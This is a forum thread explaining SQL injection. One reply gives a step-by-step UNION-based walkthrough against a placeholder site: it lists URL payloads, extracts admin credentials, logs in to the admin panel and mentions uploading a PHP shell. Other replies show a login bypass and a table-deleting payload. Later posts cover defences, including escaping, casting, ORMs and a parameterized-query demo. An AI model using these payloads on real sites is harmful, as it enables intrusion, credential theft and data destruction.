SQL injection is used widely by infamous hackers around the globe (Lebanon included) to hack high-profile corporations' websites.

Since I am an SQL noob, I wasn't able to understand what SQL injection is (in hacking terms) even after using Google. I know the basic syntax of SQL because it was used in my major course, Data Management. So could someone please define SQL injection and give an example, not from real DBs or sites but just a statement with its SQL, and then apply the SQL injection trick.
Here's an example:

If it is MySQL you use /*
If it is MSSQL you use --, and sometimes you don't need to put them at all.

Example: for w w w.website.com/index.php?id=1 you put [ ' ] or [ - ] before the 1, like [ ?id=-1 ]
If an SQL error appears (not a warning, it should be an SQL error), the website is vulnerable.
You use the union select command and keep going up in numbers until the error is gone.
Example: w w w.website.com/index.php?id=-1/**/union/**/select/**/1,2,3/*
If the error is gone ==> we have 3 columns.

Now you should know the name of the (users, admins, ...) tables.
Example:

w w w.website.com/index.php?id=-1/**/union/**/select/**/1,2,3/**/from/**/users/*
After entering the URL above you get an error ==> there isn't a table named "users".

So you keep trying until the error is gone.
Example: w w w.website.com/index.php?id=-1/**/union/**/select/**/1,2,3/**/from/**/members/*
Now the error is gone ==> there is a table named "members"!

Now a number should appear in the browser, for example "2",
so you enter this URL in the browser:
w w w.website.com/index.php?id=-1/**/union/**/select/**/1,username,3/**/from/**/members/*

Now, following the example, the 2 in the browser should be replaced by "admin" ==> the username is: admin

Now, to find out the password, we try this:
w w w.website.com/index.php?id=-1/**/union/**/select/**/1,password,3/**/from/**/members/*
So we got another error ==> the column that has the passwords isn't named "password".

We try another one, "passwd":
w w w.website.com/index.php?id=-1/**/union/**/select/**/1,passwd,3/**/from/**/members/*

So we got the password: 123456
Now we go to w w w.website.com/cms or w w w.website.com/panel or www.website.com/admin etc.

with the username: admin
and password: 123456

I haven't hacked through SQL injection in years. I heard there are scripts to find the cpanel URL if it isn't found, and ways to upload a PHP shell through SQL injection. Try googling :)

Best Regards.
@ZeRaW: Sorry, but I didn't want any sort of "help or how-to" tutorial, just an explanation.
@shekvaL: Thanks a lot, this is really informative.
Ah! So this is how you get the names of the fields.

I thought SQL injection was something like inserting into the password textbox [ ' ' or 1=1 ]. So when this password is sent to the main server it will read something like:

select * from x where username = 'whatever' and password = '' or 1=1

Seeing how 1=1 is always true, it will open. But then again, I have 0 knowledge on hacking haha.
It seems that this is not real hardcore hacking, rather using an exploit in the SQL DB programming. The injection takes place in the URL.
It's pretty simple. Consider this PHP code:
$username = $_POST['username'];            // raw, unescaped input from the form
$q = "SELECT * FROM `users` WHERE `username` = \"$username\" ";   // input spliced straight into the SQL text
$res = mysql_query($q);
$userRecord = mysql_fetch_object($res);
As you can see, a string received by POST is inserted directly into an SQL query. Normally this variable contains a string, the username, coming from some sort of form, for example a login or registration form, or a user search form...

Now the client can modify the POST data he is sending, and it will still be inserted directly into the SQL query.
For example, if he sends the POST variable 'username' as:
"; DELETE FROM `users` WHERE 1 or `username` = "
this will result in the query string ($q) being, after variable replacement:
SELECT * FROM `users` WHERE `username` = ""; DELETE FROM `users` WHERE 1 or `username` = ""
That is effectively 2 queries that will be executed. As you can see, the attacker can do almost anything with the database if your variables are not protected.
Another SQL trick used in SQL injection attacks is the comment delimiter: --. What this does is comment out the rest of the query.

In case you didn't figure out what the result of the attack will be in that example: deletion of all records in the "users" table.

The solution? Escape your variables.
$username = mysql_real_escape_string($_POST['username']);   // quotes in the input are escaped before they reach the SQL text
$q = "SELECT * FROM `users` WHERE `username` = \"$username\" ";
As you can see, the name of that function is annoyingly long! For integers (like numerical IDs), you can use a shorter method: casting to integer:
$id = (int) $_POST['id'];        // anything that is not a number becomes 0, so no SQL can get in
$q = "SELECT * FROM `users` WHERE `id` = $id ";
Anyway, there is still the possibility that the developer simply forgets to escape his variables. Some people try to protect themselves by creating generic functions, which may look like this:
$res = mysql_safe_query("SELECT * FROM `users` WHERE `username` = \"%1\"", $username);
Also, other more advanced means of accessing the database, such as ORM (Object Relational Mappers) and DAL (Database Abstraction Layers) usually take care of this issue.
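To make the two points above concrete (the `' or 1=1` login bypass described earlier in the thread, and rolf's point that input must never be spliced into the SQL text), here is an added example; it is not code from any poster in this thread. It runs the same login check two ways against a throwaway in-memory SQLite database with a constructed `members` table (names and the `correct-horse` password are made up for the demo): once with string-built SQL like the PHP snippet, once with bound parameters. The `' OR '1'='1` input is the balanced form of the bypass so the injected statement still parses; the last function shows the integer-cast idea for numeric IDs.

```python
"""Added example (not from the thread): string-built SQL vs. bound parameters,
exercised against an in-memory SQLite database with constructed sample data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a members table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, passwd TEXT)"
    )
    conn.execute(
        "INSERT INTO members (username, passwd) VALUES ('admin', 'correct-horse')"
    )
    conn.commit()
    return conn


def login_unsafe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: user input is pasted into the SQL text, exactly like $q in the
    PHP example. A quote in the input becomes SQL syntax."""
    sql = (
        f"SELECT id FROM members WHERE username = '{username}' "
        f"AND passwd = '{password}'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Fixed: placeholders. The driver sends the values separately from the
    statement, so a quote in the input is only ever compared as data."""
    sql = "SELECT id FROM members WHERE username = ? AND passwd = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def lookup_by_id_safe(conn: sqlite3.Connection, raw_id: str):
    """rolf's integer-cast idea for numeric IDs: refuse anything that is not an
    int before it gets near the query, then still bind it as a parameter."""
    try:
        member_id = int(raw_id)
    except ValueError:
        return None
    row = conn.execute(
        "SELECT username FROM members WHERE id = ?", (member_id,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1"   # the classic payload from the thread, balanced so it parses
    print("unsafe, wrong password, injected :", login_unsafe(db, "nobody", bypass))
    print("safe,   wrong password, injected :", login_safe(db, "nobody", bypass))
    print("safe,   real credentials         :", login_safe(db, "admin", "correct-horse"))
    print("id lookup with junk id           :", lookup_by_id_safe(db, "1 OR 1=1"))
```

The unsafe version lets the injected input through, the parameterized version treats the very same bytes as a password that simply does not match, which is why rolf's closing advice (use the library's escaping, or better an abstraction that binds parameters for you) is the right default.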
rolf wrote:
Also, other more advanced means of accessing the database, such as ORM (Object Relational Mappers) and DAL (Database Abstraction Layers) usually take care of this issue.
That's probably the best advice you could give to prevent SQL injection :)

Nice explanation by the way!
Reminds me of the old days. I once got the schema of a whole website using SQL injection and then the fun began. It was a website a lot of Leb ppl used, so yeah, fun!!
@rolf: thanks for the post. Really clear.

Two things:

1- I think "--" is vendor dependent. If I'm correct, it will only work with MySQL and MS SQL. I know for a fact that Sybase uses /* */ to delimit comments.

2- The examples you give for escaping are really PHP driven. The thing I hate about PHP is that it gives you ready-to-work functions, so you miss the inner workings. I always encourage people to come up with their own escaping solutions (often by wrapping existing core functions).
@rolf: Thanks a lot for the prevention advice, because I was going to ask about that. Your example was a bit detailed toward PHP code, which I don't know, so I hope this helped others.
rahmu wrote:
I always encourage people to come up with their own escaping solutions (often by wrapping existing core functions).
I kind of disagree with this. When doing a personal project, I would definitely roll my own escape functions because that's a good way to learn what can go wrong and how I should be thinking about input.

When writing production code, I always rely on well-tested functions provided to me by the library/framework that I'm using. Especially if it's open source, I know the code has been tested and used in real situations and that's reassuring.

It's a trade-off: I give up knowing how these functions work, for the peace of mind of not having my code compromised because I missed an edge case somewhere.